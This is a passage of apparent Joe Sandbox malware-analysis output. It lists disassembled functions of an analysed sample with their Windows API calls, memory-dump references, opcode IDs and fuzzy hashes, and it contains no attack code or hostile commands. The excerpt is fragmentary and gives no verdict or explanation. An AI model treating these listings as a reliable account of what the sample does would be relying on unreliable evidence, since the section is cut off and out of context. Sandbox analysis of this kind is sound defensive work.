                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: fa6f02dc2156d8487b6f82d977e32bdca623cfad3d546d516c294280ae91256b
                                                                                                                                                                                                                                                                                                    • Instruction ID: b7ab64840f15f7a0d0147411f69b451976b641df7d0743c86eecbbda252feda6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa6f02dc2156d8487b6f82d977e32bdca623cfad3d546d516c294280ae91256b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A21D632604111AFDB14DF24C845FAABB95EF96324F248258F8668B6D2C771EE86C7D0
                                                                                                                                                                                                                                                                                                    Function 00A7825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A796E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00A78271,?,000000FF,?,00A790BB,00000000,?,0000001C,?,?), ref: 00A796F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A796E4: lstrcpyW.KERNEL32(00000000,?,?,00A78271,?,000000FF,?,00A790BB,00000000,?,0000001C,?,?,00000000), ref: 00A79719
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A796E4: lstrcmpiW.KERNEL32(00000000,?,00A78271,?,000000FF,?,00A790BB,00000000,?,0000001C,?,?), ref: 00A7974A
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00A790BB,00000000,?,0000001C,?,?,00000000), ref: 00A7828A
                                                                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00A790BB,00000000,?,0000001C,?,?,00000000), ref: 00A782B0
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A790BB,00000000,?,0000001C,?,?,00000000), ref: 00A782EB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                                    • String ID: cdecl
                                                                                                                                                                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                                    • Opcode ID: e17e9358b87459eefbbd00c0a4c343c044d25fecf87142c977e1ae39c929c34b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 870ed662d6b2eb607e7f767c780c5f4a5d1467b214467d9fcccc27cbd2c1bdcb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e17e9358b87459eefbbd00c0a4c343c044d25fecf87142c977e1ae39c929c34b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F211D63A200242ABCB149F78DC49D7A77A9FF45750B50C12AF94ACB290EF359811D790
                                                                                                                                                                                                                                                                                                    Function 00AA60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 00AA615A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA616C
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA6177
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA62B5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b7410313c068ae80c707d3f5604ab79aa9043fbac7acf078e1c30624ce074ad4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 09e7b6428e26388370297433bbe1020f90ec53bd7ac6c094982661482fa8e118
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7410313c068ae80c707d3f5604ab79aa9043fbac7acf078e1c30624ce074ad4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0117F75900218AADF20DFA5DC84AEE7BBCEB16764F14412AFA11970C1EB708945CF60
                                                                                                                                                                                                                                                                                                    Function 00A42079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 49863170fc034fbc93fc678d7dcd5834e7c8c01565f3756ce6e984838f22ed49
                                                                                                                                                                                                                                                                                                    • Instruction ID: a9dbe2cea388c0da25196d45e139029f0001dd90d617aacbc350fcf5a73127c2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49863170fc034fbc93fc678d7dcd5834e7c8c01565f3756ce6e984838f22ed49
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1701ADBA6092167EF6312AB8BCC0F27679DDFC23B8B700725B521A51D1DF608C818360
                                                                                                                                                                                                                                                                                                    Function 00A72374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00A72394
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A723A6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A723BC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A723D7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8980dd9cd2d5102663ddcf0e329eec2897f6647fe9ad7949a9e4dbda81e85c8d
                                                                                                                                                                                                                                                                                                    • Instruction ID: d1592781d2da283ed2a67a21cf4d1061c089db39fac35c1af6900ad2f11236c6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8980dd9cd2d5102663ddcf0e329eec2897f6647fe9ad7949a9e4dbda81e85c8d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE11273AD00218FFEB119BA4CD85F9DBB78EB08750F204091EA05BB290D6716E10DB94
                                                                                                                                                                                                                                                                                                    Function 00A11AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00A11AF4
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00A531F9
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00A53203
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00A5320E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 41e0bc607cd4848c2bfb9f39ab41298261c0ae8ca973d64dbab00bff65e5b7ec
                                                                                                                                                                                                                                                                                                    • Instruction ID: 813be7310adc32524601e9c316ee60f03a596e693240b65e0044ee5621f96c31
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41e0bc607cd4848c2bfb9f39ab41298261c0ae8ca973d64dbab00bff65e5b7ec
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE113A32A0201AABDF00DFA4C9859EE7BB9FF45381F100452EA02E7140C770BA92CBA1
                                                                                                                                                                                                                                                                                                    Function 00A7EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A7EB14
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00A7EB47
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A7EB5D
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A7EB64
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3e0cd384fbb94be39fb67a41b3eb9f12b4ff25752331130af8c16dbe0908b573
                                                                                                                                                                                                                                                                                                    • Instruction ID: d4b15270ee742e89e88b567080f5aa88dba1fbe9e8fe3212eff3e96bdf51109c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e0cd384fbb94be39fb67a41b3eb9f12b4ff25752331130af8c16dbe0908b573
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9811DB76900259BBCB01DFE89C45A9F7FADEB4A310F14C256F816E72D0D77489058B60
                                                                                                                                                                                                                                                                                                    Function 00A3D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00A3D369,00000000,00000004,00000000), ref: 00A3D588
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A3D594
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00A3D59B
                                                                                                                                                                                                                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 00A3D5B9
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 31e26d887e7fa112aca8040446f66d34af9ead0fd757bc30fbcf6913383d350b
                                                                                                                                                                                                                                                                                                    • Instruction ID: e4ac1e61b58fe1795e7f6e01cb472ec799aafb52d539175071de6e5e9be374d3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31e26d887e7fa112aca8040446f66d34af9ead0fd757bc30fbcf6913383d350b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C901B572814214FFDB116FA5FC05BAA7B69EF82735F100219F9268A1E0DB718945C6A1
                                                                                                                                                                                                                                                                                                    Function 00A17873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A178B1
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00A178C5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A178CF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1170f83b5ec02d021c6fbb583f231ba1d3d2884c27f1f882d0db78232de6bd63
                                                                                                                                                                                                                                                                                                    • Instruction ID: b7e7fb2548cc528509eba4f7fee4172450df20bdc426e63fcc84e8bcf60ac480
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1170f83b5ec02d021c6fbb583f231ba1d3d2884c27f1f882d0db78232de6bd63
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B011A972505149BFEF169F90CC58EEABB79FF093A4F042116FA0252160DB319CA0EBA0
                                                                                                                                                                                                                                                                                                    Function 00A433E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00A4338D,00000364,00000000,00000000,00000000,?,00A435FE,00000006,FlsSetValue), ref: 00A43418
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00A4338D,00000364,00000000,00000000,00000000,?,00A435FE,00000006,FlsSetValue,00AB3260,FlsSetValue,00000000,00000364,?,00A431B9), ref: 00A43424
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A4338D,00000364,00000000,00000000,00000000,?,00A435FE,00000006,FlsSetValue,00AB3260,FlsSetValue,00000000), ref: 00A43432
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6d6787689fd3d928fce8a0702f76ae834f76da0a4712b2b507f5cff8478c01ea
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2dd4140ddc0f4fa2e57cb6f7e4cd94850b9ed273b22c20c28ac4f1b3b3f23ea8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d6787689fd3d928fce8a0702f76ae834f76da0a4712b2b507f5cff8478c01ea
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C501A037711223A7CF228BB59C44AD67B68BF95B627210620F947D7581D721DD02C6E0
                                                                                                                                                                                                                                                                                                    Function 00A7BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A7B69A,?,00008000), ref: 00A7BA8B
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A7B69A,?,00008000), ref: 00A7BAB0
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A7B69A,?,00008000), ref: 00A7BABA
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A7B69A,?,00008000), ref: 00A7BAED
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: d354965ca5391ceea39dba81105379e52360401b194a4b535836a5f57ed45ee7
                                                                                                                                                                                                                                                                                                    • Instruction ID: db1a660b453c12b37178bd6686bda6adf3b0d5c1a6884a2848e2762d4e8f17ee
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d354965ca5391ceea39dba81105379e52360401b194a4b535836a5f57ed45ee7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86118EB0C11529DBCF00EFE9ED497EEBB78BF09750F108195D585B2180CB308651CB61
                                                                                                                                                                                                                                                                                                    Function 00AA886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AA888E
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00AA88A6
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00AA88CA
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AA88E5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
